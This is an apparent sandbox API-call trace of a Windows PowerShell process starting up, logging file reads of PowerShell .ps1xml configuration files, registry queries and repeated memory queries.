[0077.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1000, lpOverlapped=0x0) returned 1
[0077.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x1b4, lpOverlapped=0x0) returned 1
[0077.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2dbc9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd008, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9f8*, lpNumberOfBytesRead=0xcd008*=0x0, lpOverlapped=0x0) returned 1
[0077.934] CloseHandle (hObject=0x32c) returned 1
[0077.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.934] SetErrorMode (uMode=0x1) returned 0x1
[0077.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf80 | out: lpFileInformation=0xccf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.935] SetErrorMode (uMode=0x1) returned 0x1
[0077.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.935] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x32c) returned 0x0
[0077.935] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
[0077.935] CoTaskMemAlloc (cb=0x5a) returned 0x301eb0
[0077.935] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x301eb0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
[0077.935] CoTaskMemFree (pv=0x301eb0)
[0077.935] RegCloseKey (hKey=0x32c) returned 0x0
[0077.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0078.723] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.785] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.788] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.788] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.788] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.788] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.790] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.791] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.825] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.825] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.825] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.825] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.825] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.826] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.826] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.826] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.831] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.836] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.836] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.836] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.837] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.838] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.838] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.838] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.838] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.839] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.839] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.839] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.839] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.839] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.841] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.842] VirtualQuery (in: lpAddress=0xcbd60, lpBuffer=0xccc20, dwLength=0x30 | out: lpBuffer=0xccc20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.842] VirtualQuery (in: lpAddress=0xcbd60, lpBuffer=0xccc20, dwLength=0x30 | out: lpBuffer=0xccc20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.843] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.844] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.077] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.077] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.077] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.080] CoTaskMemAlloc (cb=0x104) returned 0x2c78a0
[0079.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c78a0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.080] CoTaskMemFree (pv=0x2c78a0)
[0079.126] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.175] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.175] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.176] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.176] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.176] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.176] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.177] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.190] VirtualQuery (in: lpAddress=0xcbd50, lpBuffer=0xccc10, dwLength=0x30 | out: lpBuffer=0xccc10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.191] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x300) returned 0x0
[0079.191] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0xcd21c, lpData=0x0, lpcbData=0xcd218*=0x0 | out: lpType=0xcd21c*=0x1, lpData=0x0, lpcbData=0xcd218*=0x74) returned 0x0
[0079.191] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0xcd18c, lpData=0x0, lpcbData=0xcd188*=0x0 | out: lpType=0xcd18c*=0x1, lpData=0x0, lpcbData=0xcd188*=0x74) returned 0x0
[0079.191] CoTaskMemAlloc (cb=0x78) returned 0x2fbb10
[0079.191] RegQueryValueExW (in: hKey=0x300, lpValueName="path", lpReserved=0x0, lpType=0xcd15c, lpData=0x2fbb10, lpcbData=0xcd158*=0x74 | out: lpType=0xcd15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd158*=0x74) returned 0x0
[0079.191] CoTaskMemFree (pv=0x2fbb10)
[0079.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
[0079.191] SetErrorMode (uMode=0x1) returned 0x1
[0079.191] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0079.191] SetErrorMode (uMode=0x1) returned 0x1
[0079.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.192] SetErrorMode (uMode=0x1) returned 0x1
[0079.192] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.212] SetErrorMode (uMode=0x1) returned 0x1
[0079.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.212] SetErrorMode (uMode=0x1) returned 0x1
[0079.212] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.212] SetErrorMode (uMode=0x1) returned 0x1
[0079.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.212] SetErrorMode (uMode=0x1) returned 0x1
[0079.212] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.212] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
[0079.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.213] SetErrorMode (uMode=0x1) returned 0x1
